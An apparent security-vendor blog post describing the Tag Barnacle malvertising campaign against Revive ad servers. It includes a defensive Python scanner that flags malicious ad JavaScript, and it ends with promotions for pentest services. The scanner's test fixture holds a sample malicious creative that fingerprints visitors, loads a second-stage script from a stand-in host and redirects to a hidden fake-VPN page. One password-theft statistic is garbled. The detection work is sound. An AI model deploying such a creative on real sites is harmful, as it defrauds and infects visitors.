Introduction

This article aims to raise awareness of an incident in which 120 compromised ad servers were used to target millions of Internet users amid the COVID-19 pandemic.

Since the beginning of the pandemic in 2020, most people have been forced to stay indoors and work online from their homes. This trying period also saw hackers working overtime to penetrate personal devices and access users' confidential data, including passwords. Most of us can recall how annoying pop-ups have multiplied over this time, with messages such as “you have won” or “your device is compromised.”

People tend to fall prey to such pop-up ads and click on them out of fear or greed. That click often ends with malware being installed on the device. Hackers attack personal devices more than corporate devices: corporate devices are usually well protected by internal firewalls and by external service providers such as Cisco, whereas personal devices are far less protected, which makes them soft targets.

The pandemic attack of ad servers

Recently, the news reported that hackers have attacked more than 120 ad servers since the pandemic lockdowns started, in a well-organized, sustained malicious ad campaign targeting millions of devices. These malicious ads look benign on the surface and are trusted by the users who fall into their trap.

Malvertising is the new demon on the block. Malvertisers deliver ads to people who visit a wide range of websites. These ads embed JavaScript that exploits flaws in the device's software and trick people into downloading an unsafe app, paying fraudulent fees and putting their device and data at tremendous risk.

Scammers usually hoodwink the internet ecosystem by posing as buyers: they pay fees to ad delivery networks and get their malicious ads displayed on individual sites. Infiltrating the ad ecosystem this way requires time and resources. However, a malvertising group known as “Tag Barnacle” has been using a different strategy. Rather than posing as buyers, they went straight for the ad-serving infrastructure and compromised it. This meant they saved money by not running any ad campaigns and instead got hold of personal information for free.

This group has attacked and infected more than 120 ad servers in the past year that run the open-source ad-serving software known as Revive. The hackers placed primary and secondary malicious payloads on the compromised ad servers and used client-side fingerprinting to evade detection. Tag Barnacle’s target in 2020 was desktop traffic; in 2021 they have focused on targeting mobile devices as well.

How was the malicious activity carried out?

Websites that receive ads from a hacked server run client-side fingerprinting on the visitor. Once certain checks are satisfied, the second-stage JavaScript payload is delivered; it lets the user click the tracked ad and then redirects them to malicious websites. There, users are lured into buying a VPN app or a fake security or safety app that comes with a subscription cost. The attackers also set a cookie on each victim so that the payload is shown only at low frequency, which helps it avoid detection.
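The behaviours described above (fingerprinting the visitor, loading a second stage only after checks pass, cookie-based frequency capping, and a forced redirect away from the hosting page) can be turned into a simple triage heuristic for the JavaScript an ad server returns. The following scanner is an added example written for this article, not code from the original post or from Confiant or Revive; the indicator list, weights and thresholds are assumptions to be tuned on real traffic, and all three sample creatives are constructed for illustration.

```python
"""
Heuristic triage of ad-tag JavaScript returned by an ad server.

Scores a creative on the traits described in the Tag Barnacle write-up:
  * client-side fingerprinting (probing navigator/screen properties),
  * a second-stage loader that injects another script after checks pass,
  * a forced redirect of the hosting page,
  * cookie-based frequency capping so the payload shows only rarely.
Weights and thresholds are assumptions for this example; tune on real data.
"""
import re
from dataclasses import dataclass, field

# (label, pattern, weight). A trait counts once per creative, however
# many times it appears.
INDICATORS = [
    ("fingerprinting",
     re.compile(r"navigator\.(userAgent|platform|plugins|languages|webdriver)"
                r"|screen\.(width|height|colorDepth)"), 2),
    ("second_stage_loader",
     re.compile(r"createElement\(\s*['\"]script['\"]\s*\)|new Function\(|eval\("), 2),
    ("forced_redirect",
     # assignment to location/location.href, not a comparison (== / ===)
     re.compile(r"(top|parent|window)?\.?location(\.href)?\s*=(?!=)"
                r"|location\.(replace|assign)\("), 3),
    ("cookie_frequency_cap", re.compile(r"document\.cookie"), 1),
    ("obfuscated_payload", re.compile(r"atob\(|fromCharCode\("), 1),
]


@dataclass
class ScanResult:
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # Fingerprinting or cookies alone are common in legitimate responsive
        # creatives, so they only earn a manual review; the redirect plus a
        # loader is what pushes a creative into "suspicious".
        if self.score >= 5:
            return "suspicious"
        if self.score >= 2:
            return "review"
        return "benign"


def scan_creative(js: str) -> ScanResult:
    """Score one creative's JavaScript against the indicator list."""
    result = ScanResult()
    for label, pattern, weight in INDICATORS:
        if pattern.search(js):
            result.hits.append(label)
            result.score += weight
    return result


# --- constructed sample creatives (not real ad tags) -------------------------
BENIGN_CREATIVE = """
var img = document.createElement('img');
img.src = 'https://ads.example/imp?cid=123';
img.width = 300; img.height = 250;
document.getElementById('slot').appendChild(img);
"""

# Legitimate pattern that still trips two indicators: picks a size from
# screen.width and caps impressions with a cookie.
RESPONSIVE_CREATIVE = """
var w = screen.width < 768 ? 320 : 728;
if (document.cookie.indexOf('cz_cap=') === -1) {
  document.cookie = 'cz_cap=1; max-age=86400';
}
var img = document.createElement('img');
img.src = 'https://ads.example/creative_' + w + '.png';
document.getElementById('slot').appendChild(img);
"""

# Mimics the flow described in the text: fingerprint, gate on a cookie so the
# payload fires rarely, inject a second-stage script, then force a redirect
# to a (constructed, .invalid) fake-VPN landing page hidden in base64.
SUSPICIOUS_CREATIVE = """
if (!/bot|headless/i.test(navigator.userAgent) && screen.width < 800 && !navigator.webdriver) {
  if (document.cookie.indexOf('seen=') === -1) {
    document.cookie = 'seen=1; max-age=604800';
    var s = document.createElement('script');
    s.src = 'https://ad-server.invalid/stage2.js';
    document.head.appendChild(s);
    setTimeout(function () { top.location.href = atob('aHR0cHM6Ly9mYWtlLXZwbi5pbnZhbGlkLw=='); }, 1000);
  }
}
"""


def triage(creatives: dict) -> dict:
    """Map creative name -> verdict for a batch pulled from an ad server."""
    return {name: scan_creative(js).verdict for name, js in creatives.items()}


if __name__ == "__main__":
    samples = {"benign": BENIGN_CREATIVE,
               "responsive": RESPONSIVE_CREATIVE,
               "suspicious": SUSPICIOUS_CREATIVE}
    for name, js in samples.items():
        r = scan_creative(js)
        print(f"{name:11s} score={r.score:2d} verdict={r.verdict:10s} hits={r.hits}")
```

Run it against the creatives a Revive instance actually serves (for example by fetching each zone's tag and feeding the response to `scan_creative`); a "review" verdict is expected for many legitimate responsive creatives, so the useful signal is a creative that jumps to "suspicious" because a redirect and a second-stage loader appeared where the publisher never placed them.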

When hackers successfully install malware on a device, the user is unaware, because the malicious code lurks in the background. The malware harvests personal information and passwords as the user visits different websites. The most dangerous case is when a user logs in to online banking: the login ID and password are harvested. Some malware, known as ransomware, also encrypts the user's files and demands money to decrypt them.

How do cybersecurity companies protect against hacking?

Several cybersecurity firms have taken note of the malvertising. Stolen passwords have been the major concern: in 2020 alone, nearly 6.30 billion passwords were stolen, and 80% confirmed such data breaches. The banking, government, healthcare, and retail sectors have been especially susceptible to fraud.

Cybersecurity firms deploy penetration testing tools to identify weaknesses in a system, especially in how its network security features currently function. These tools are useful because they can detect unknown vulnerabilities in software and network applications that could lead to a security breach. Many organizations lack visibility into their risks and into their own ability to respond to threats. For them, cybersecurity service providers specializing in managed detection and response (MDR) supply the tools and technologies to detect threats and respond adequately. They place these tools on the client's premises, guard the internet gateways, and detect threats that have bypassed the client's standard security perimeter.

Engaging a third-party cybersecurity service provider helps detect threats and ensures that the client receives comprehensive penetration tests. These include IoT penetration testing, VPN penetration testing, web penetration testing, network penetration testing, managed detection and response, and IT security training (network). The cybersecurity firm keeps the client's systems and network under 24/7 surveillance through a combination of automated and manual monitoring.

We are offering various services like Penetration Testing, Digital Forensics, System Hardening and Managed Detection & Response (MDR).

Click here to learn more about our services


Get trained by Condition Zebra’s Cybersecurity Experts

We’re offering specialized training in Network Penetration Testing and Web Application Penetration Testing. Both training programs are high value because they include a practical session; so far, 600+ IT professionals from various backgrounds have attended the training.

Click here to learn about Network Pentest training

Click here to learn about Web Application Pentest training